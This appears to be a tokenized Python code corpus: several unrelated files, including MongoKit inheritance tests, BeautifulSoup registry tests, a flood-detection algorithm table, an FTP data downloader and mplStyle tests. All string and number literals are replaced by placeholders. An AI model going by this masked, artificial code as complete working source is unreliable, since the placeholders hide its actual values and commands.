self . assertTrue ( isinstance ( self . connection . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . connection . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) [ <NUM_LIT:0> ] , B ) ) <EOL> def test_inherited_queries_without___collection__ ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , '<STR_LIT:A>' ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , '<STR_LIT:B>' ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) [ <NUM_LIT:0> ] , B ) ) <EOL> def test_type_field_is_None ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> type_field = None <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , None ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , None ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , A ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> def test_no__type ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> structure = { <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertTrue ( '<STR_LIT>' not in doc_a ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . assertTrue ( '<STR_LIT>' not in doc_b ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , A ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> def test_change_type_field ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> type_field = '<STR_LIT>' <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , None ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , '<STR_LIT:A>' ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , None ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , '<STR_LIT:B>' ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) </s>
<s> import subprocess <EOL> import sys <EOL> from distutils . core import setup , Command <EOL> class TestCommand ( Command ) : <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> errno = subprocess . call ( [ sys . executable , '<STR_LIT>' ] ) <EOL> raise SystemExit ( errno ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' , ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> cmdclass = { '<STR_LIT:test>' : TestCommand } , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import warnings <EOL> from bs4 import BeautifulSoup <EOL> from bs4 . builder import ( <EOL> builder_registry as registry , <EOL> HTMLParserTreeBuilder , <EOL> TreeBuilderRegistry , <EOL> ) <EOL> try : <EOL> from bs4 . builder import HTML5TreeBuilder <EOL> HTML5LIB_PRESENT = True <EOL> except ImportError : <EOL> HTML5LIB_PRESENT = False <EOL> try : <EOL> from bs4 . builder import ( <EOL> LXMLTreeBuilderForXML , <EOL> LXMLTreeBuilder , <EOL> ) <EOL> LXML_PRESENT = True <EOL> except ImportError : <EOL> LXML_PRESENT = False <EOL> class BuiltInRegistryTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_combination ( self ) : <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT:html>' ) , <EOL> LXMLTreeBuilder ) <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> LXMLTreeBuilderForXML ) <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:strict>' , '<STR_LIT:html>' ) , <EOL> HTMLParserTreeBuilder ) <EOL> if HTML5LIB_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT:html>' ) , <EOL> HTML5TreeBuilder ) <EOL> def test_lookup_by_markup_type ( self ) : <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:html>' ) , LXMLTreeBuilder ) <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , LXMLTreeBuilderForXML ) <EOL> else : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , None ) <EOL> if HTML5LIB_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:html>' ) , HTML5TreeBuilder ) <EOL> else : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:html>' ) , HTMLParserTreeBuilder ) <EOL> def test_named_library ( self ) : <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> LXMLTreeBuilderForXML ) <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT:html>' ) , <EOL> LXMLTreeBuilder ) <EOL> if HTML5LIB_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , <EOL> HTML5TreeBuilder ) <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , <EOL> HTMLParserTreeBuilder ) <EOL> def test_beautifulsoup_constructor_does_lookup ( self ) : <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> BeautifulSoup ( "<STR_LIT>" , features = "<STR_LIT:html>" ) <EOL> BeautifulSoup ( "<STR_LIT>" , features = [ "<STR_LIT:html>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( ValueError , BeautifulSoup , <EOL> "<STR_LIT>" , features = "<STR_LIT>" ) <EOL> class RegistryTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . registry = TreeBuilderRegistry ( ) <EOL> def builder_for_features ( self , * feature_list ) : <EOL> cls = type ( '<STR_LIT>' + '<STR_LIT:_>' . join ( feature_list ) , <EOL> ( object , ) , { '<STR_LIT>' : feature_list } ) <EOL> self . registry . register ( cls ) <EOL> return cls <EOL> def test_register_with_no_features ( self ) : <EOL> builder = self . builder_for_features ( ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' ) , None ) <EOL> self . assertEqual ( self . registry . lookup ( ) , builder ) <EOL> def test_register_with_features_makes_lookup_succeed ( self ) : <EOL> builder = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' ) , builder ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:bar>' ) , builder ) <EOL> def test_lookup_fails_when_no_builder_implements_feature ( self ) : <EOL> builder = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT>' ) , None ) <EOL> def test_lookup_gets_most_recent_registration_when_no_feature_specified ( self ) : <EOL> builder1 = self . builder_for_features ( '<STR_LIT:foo>' ) <EOL> builder2 = self . builder_for_features ( '<STR_LIT:bar>' ) <EOL> self . assertEqual ( self . registry . lookup ( ) , builder2 ) <EOL> def test_lookup_fails_when_no_tree_builders_registered ( self ) : <EOL> self . assertEqual ( self . registry . lookup ( ) , None ) <EOL> def test_lookup_gets_most_recent_builder_supporting_all_features ( self ) : <EOL> has_one = self . builder_for_features ( '<STR_LIT:foo>' ) <EOL> has_the_other = self . builder_for_features ( '<STR_LIT:bar>' ) <EOL> has_both_early = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> has_both_late = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> lacks_one = self . builder_for_features ( '<STR_LIT:bar>' ) <EOL> has_the_other = self . builder_for_features ( '<STR_LIT:foo>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> has_both_late ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) , <EOL> has_both_early ) <EOL> def test_lookup_fails_when_cannot_reconcile_requested_features ( self ) : <EOL> builder1 = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> builder2 = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:bar>' , '<STR_LIT>' ) , None ) </s>
<s> import ee <EOL> from adaboost import * <EOL> from dnns import * <EOL> from ee_classifiers import * <EOL> from misc_algorithms import * <EOL> from modis_utilities import * <EOL> from simple_modis_algorithms import * <EOL> import cmt . radar . active_contour <EOL> '''<STR_LIT>''' <EOL> EVI = <NUM_LIT:1> <EOL> XIAO = <NUM_LIT:2> <EOL> DIFFERENCE = <NUM_LIT:3> <EOL> CART = <NUM_LIT:4> <EOL> SVM = <NUM_LIT:5> <EOL> RANDOM_FORESTS = <NUM_LIT:6> <EOL> DNNS = <NUM_LIT:7> <EOL> DNNS_DEM = <NUM_LIT:8> <EOL> DIFFERENCE_HISTORY = <NUM_LIT:9> <EOL> DARTMOUTH = <NUM_LIT:10> <EOL> DNNS_REVISED = <NUM_LIT:11> <EOL> DEM_THRESHOLD = <NUM_LIT:12> <EOL> MARTINIS_TREE = <NUM_LIT> <EOL> DNNS_DIFF = <NUM_LIT> <EOL> DNNS_DIFF_DEM = <NUM_LIT:15> <EOL> DIFF_LEARNED = <NUM_LIT:16> <EOL> DART_LEARNED = <NUM_LIT> <EOL> FAI = <NUM_LIT> <EOL> FAI_LEARNED = <NUM_LIT> <EOL> MODNDWI = <NUM_LIT:20> <EOL> MODNDWI_LEARNED = <NUM_LIT> <EOL> ADABOOST = <NUM_LIT> <EOL> ADABOOST_LEARNED = <NUM_LIT> <EOL> ADABOOST_DEM = <NUM_LIT> <EOL> ACTIVE_CONTOUR = <NUM_LIT> <EOL> _ALGORITHMS = { <EOL> EVI : ( '<STR_LIT>' , evi , False , '<STR_LIT>' ) , <EOL> XIAO : ( '<STR_LIT>' , xiao , False , '<STR_LIT>' ) , <EOL> DIFFERENCE : ( '<STR_LIT>' , modis_diff , False , '<STR_LIT>' ) , <EOL> DIFF_LEARNED : ( '<STR_LIT>' , diff_learned , False , '<STR_LIT>' ) , <EOL> DARTMOUTH : ( '<STR_LIT>' , dartmouth , False , '<STR_LIT>' ) , <EOL> DART_LEARNED : ( '<STR_LIT>' , dart_learned , False , '<STR_LIT>' ) , <EOL> FAI : ( '<STR_LIT>' , fai , False , '<STR_LIT>' ) , <EOL> FAI_LEARNED : ( '<STR_LIT>' , fai_learned , False , '<STR_LIT>' ) , <EOL> MODNDWI : ( '<STR_LIT>' , mod_ndwi , False , '<STR_LIT>' ) , <EOL> MODNDWI_LEARNED : ( '<STR_LIT>' , mod_ndwi_learned , False , '<STR_LIT>' ) , <EOL> CART : ( '<STR_LIT>' , cart , False , '<STR_LIT>' ) , <EOL> SVM : ( '<STR_LIT>' , svm , False , '<STR_LIT>' ) , <EOL> RANDOM_FORESTS : ( '<STR_LIT>' , random_forests , False , '<STR_LIT>' ) , <EOL> DNNS : ( '<STR_LIT>' , dnns , True , '<STR_LIT>' ) , <EOL> DNNS_DIFF : ( '<STR_LIT>' , dnns_diff , True , '<STR_LIT>' ) , <EOL> DNNS_REVISED : ( '<STR_LIT>' , dnns_revised , False , '<STR_LIT>' ) , <EOL> DNNS_DEM : ( '<STR_LIT>' , dnns_dem , False , '<STR_LIT>' ) , <EOL> DNNS_DIFF_DEM : ( '<STR_LIT>' , dnns_diff_dem , False , '<STR_LIT>' ) , <EOL> DIFFERENCE_HISTORY : ( '<STR_LIT>' , history_diff , False , '<STR_LIT>' ) , <EOL> DEM_THRESHOLD : ( '<STR_LIT>' , dem_threshold , False , '<STR_LIT>' ) , <EOL> MARTINIS_TREE : ( '<STR_LIT>' , martinis_tree , False , '<STR_LIT>' ) , <EOL> ADABOOST : ( '<STR_LIT>' , adaboost , False , '<STR_LIT>' ) , <EOL> ADABOOST_LEARNED : ( '<STR_LIT>' , adaboost_learn , False , '<STR_LIT>' ) , <EOL> ADABOOST_DEM : ( '<STR_LIT>' , adaboost_dem , False , '<STR_LIT>' ) , <EOL> ACTIVE_CONTOUR : ( '<STR_LIT>' , <EOL> cmt . radar . active_contour . active_countour_skybox , False , '<STR_LIT>' ) , <EOL> } <EOL> def detect_flood ( domain , algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> approach = _ALGORITHMS [ algorithm ] <EOL> except : <EOL> return None <EOL> return ( approach [ <NUM_LIT:0> ] , approach [ <NUM_LIT:1> ] ( domain , compute_modis_indices ( domain ) ) ) <EOL> def get_algorithm_name ( algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return _ALGORITHMS [ algorithm ] [ <NUM_LIT:0> ] <EOL> except : <EOL> return None <EOL> def get_algorithm_color ( algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return _ALGORITHMS [ algorithm ] [ <NUM_LIT:3> ] <EOL> except : <EOL> return None <EOL> def is_algorithm_fractional ( algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return _ALGORITHMS [ algorithm ] [ <NUM_LIT:2> ] <EOL> except : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> from ftplib import FTP <EOL> from datetime import datetime , timedelta <EOL> import tempfile <EOL> import subprocess <EOL> import datasets <EOL> import dbio <EOL> import re <EOL> table = "<STR_LIT>" <EOL> def dates ( dbname ) : <EOL> dts = datasets . dates ( dbname , table ) <EOL> return dts <EOL> def download ( dbname , dts , bbox ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" <EOL> ftp = FTP ( url ) <EOL> ftp . login ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ftp . cwd ( "<STR_LIT>" ) <EOL> outpath = tempfile . mkdtemp ( ) <EOL> for dt in [ dts [ <NUM_LIT:0> ] + timedelta ( t ) for t in range ( ( dts [ <NUM_LIT:1> ] - dts [ <NUM_LIT:0> ] ) . days + <NUM_LIT:1> ) ] : <EOL> try : <EOL> ftp . cwd ( "<STR_LIT>" . format ( dt . year , dt . month ) ) <EOL> filenames = [ f for f in ftp . nlst ( ) if re . match ( r"<STR_LIT>" . format ( dt . strftime ( "<STR_LIT>" ) ) , f ) is not None ] <EOL> if len ( filenames ) > <NUM_LIT:0> : <EOL> fname = filenames [ <NUM_LIT:0> ] <EOL> with open ( "<STR_LIT>" . format ( outpath , fname ) , '<STR_LIT:wb>' ) as f : <EOL> ftp . retrbinary ( "<STR_LIT>" . format ( fname ) , f . write ) <EOL> with open ( "<STR_LIT>" . format ( outpath , fname . replace ( "<STR_LIT>" , "<STR_LIT>" ) ) , '<STR_LIT:wb>' ) as f : <EOL> ftp . retrbinary ( "<STR_LIT>" . format ( fname . replace ( "<STR_LIT>" , "<STR_LIT>" ) ) , f . write ) <EOL> tfname = fname . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> fname = datasets . uncompress ( fname , outpath ) <EOL> datasets . uncompress ( tfname , outpath ) <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( outpath , fname ) , "<STR_LIT>" . format ( outpath ) ] ) <EOL> if bbox is not None : <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( bbox [ <NUM_LIT:0> ] ) , "<STR_LIT>" . format ( bbox [ <NUM_LIT:3> ] ) , "<STR_LIT>" . format ( bbox [ <NUM_LIT:2> ] ) , "<STR_LIT>" . format ( bbox [ <NUM_LIT:1> ] ) , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" . format ( outpath ) ] ) <EOL> else : <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" . format ( outpath ) ] ) <EOL> cmd = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" ] ) <EOL> subprocess . call ( cmd , shell = True ) <EOL> dbio . ingest ( dbname , "<STR_LIT>" . format ( outpath ) , dt , table , False ) <EOL> except : <EOL> print ( "<STR_LIT>" . format ( table , dt . strftime ( "<STR_LIT>" ) ) ) </s>
<s> """<STR_LIT>""" <EOL> ebTemplate = """<STR_LIT>""" <EOL> wbTemplate = """<STR_LIT>""" <EOL> surTemplate = """<STR_LIT>""" <EOL> subTemplate = """<STR_LIT>""" <EOL> evaTemplate = """<STR_LIT>""" <EOL> cspTemplate = """<STR_LIT>""" <EOL> def template ( varlist ) : <EOL> """<STR_LIT>""" <EOL> out = "<STR_LIT>" . format ( len ( varlist ) ) <EOL> out += "<STR_LIT:\n>" <EOL> if "<STR_LIT>" in varlist : <EOL> out += ebTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += cspTemplate <EOL> if "<STR_LIT:wb>" in varlist : <EOL> out += wbTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += surTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += subTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += evaTemplate <EOL> return out <EOL> def variableGroup ( args ) : <EOL> """<STR_LIT>""" <EOL> groupvars = { '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT:wb>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] } <EOL> for v in args : <EOL> if v in groupvars : <EOL> args . remove ( v ) <EOL> for gv in groupvars [ v ] : <EOL> if gv not in args : <EOL> args . append ( gv ) <EOL> return args </s>
<s> "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> import unittest <EOL> import matplotlib as mpl <EOL> import matplotlib . axes <EOL> import matplotlib . figure <EOL> import matplotlib . patches <EOL> from mplStyle import MplSubStyle <EOL> class TestMplSubStyle ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkElement ( self , testName , values , element ) : <EOL> for property in values : <EOL> expected = values [ property ] <EOL> msg = "<STR_LIT>" % ( testName , property ) <EOL> getFunc = getattr ( element , '<STR_LIT>' % property ) <EOL> self . assertEqual ( expected , getFunc ( ) , msg = msg ) <EOL> def testBasic ( self ) : <EOL> """<STR_LIT>""" <EOL> figVals = { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } <EOL> axVals = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> patchVals = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> fig = mpl . figure . Figure ( ) <EOL> ax = mpl . axes . Axes ( fig , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> element = mpl . patches . Patch ( ) <EOL> style = MplSubStyle ( <EOL> figure = { <EOL> '<STR_LIT:width>' : figVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : figVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : figVals [ '<STR_LIT>' ] , <EOL> } , <EOL> axes = { <EOL> '<STR_LIT>' : axVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : axVals [ '<STR_LIT>' ] , <EOL> } , <EOL> patch = { <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> } <EOL> ) <EOL> style . apply ( fig ) <EOL> self . checkElement ( "<STR_LIT>" , figVals , fig ) <EOL> style . apply ( ax ) <EOL> self . checkElement ( "<STR_LIT>" , axVals , ax ) <EOL> style . apply ( element ) <EOL> self . checkElement ( "<STR_LIT>" , patchVals , element ) <EOL> self . assertRaises ( Exception , style . apply , '<STR_LIT>' , <EOL> msg = "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> def toListOf ( value , converter , allowOne = False , allowNone = False , name = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if value is None and allowNone : <EOL> return None <EOL> if name : <EOL> name = "<STR_LIT>" % name <EOL> if isinstance ( value , tuple ) : <EOL> valueList = list ( value ) <EOL> elif isinstance ( value , list ) : <EOL> valueList = value <EOL> elif allowOne : <EOL> valueList = [ value ] <EOL> else : <EOL> msg = "<STR_LIT>" "<STR_LIT>" % ( name , value ) <EOL> raise Exception ( msg ) <EOL> results = [ ] <EOL> try : <EOL> for v in valueList : <EOL> results . append ( converter ( v ) ) <EOL> except Exception , e : <EOL> msg = "<STR_LIT>" % ( e , name ) <EOL> raise Exception ( msg ) <EOL> return results </s>
<s> "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> import unittest <EOL> import mplStyle as S <EOL> class MyStyle ( S . types . Style ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , kw = { } , parent = None , custom = None ) : <EOL> self . figure = S . types . Data ( <EOL> text = S . types . Data ( <EOL> size = None , <EOL> color = None , <EOL> ) , <EOL> bgColor = None , <EOL> fgColor = None , <EOL> ) <EOL> self . axes = S . types . Data ( <EOL> text = S . types . Data ( <EOL> size = None , <EOL> color = None , <EOL> ) , <EOL> bgColor = None , <EOL> fgColor = None , <EOL> ) <EOL> S . types . Style . __init__ ( self , name , kw , parent , custom ) <EOL> def __str__ ( self ) : <EOL> s = "<STR_LIT>" % self . name <EOL> s += "<STR_LIT>" % self . figure <EOL> s += "<STR_LIT>" % self . axes <EOL> return s <EOL> def copy ( self , newName ) : <EOL> style = MyStyle ( newName , { } , self . parent , self . custom ) <EOL> style . figure = self . figure . copy ( deep = True ) <EOL> style . axes = self . axes . copy ( deep = True ) <EOL> return style <EOL> def update ( self , style ) : <EOL> super ( MyStyle , self ) . update ( style ) <EOL> if style . figure . text . size is not None : <EOL> self . figure . text . size = style . figure . text . size <EOL> if style . figure . text . color is not None : <EOL> self . figure . text . color = style . figure . text . color <EOL> if style . figure . bgColor is not None : <EOL> self . figure . bgColor = style . figure . bgColor <EOL> if style . figure . fgColor is not None : <EOL> self . figure . fgColor = style . figure . 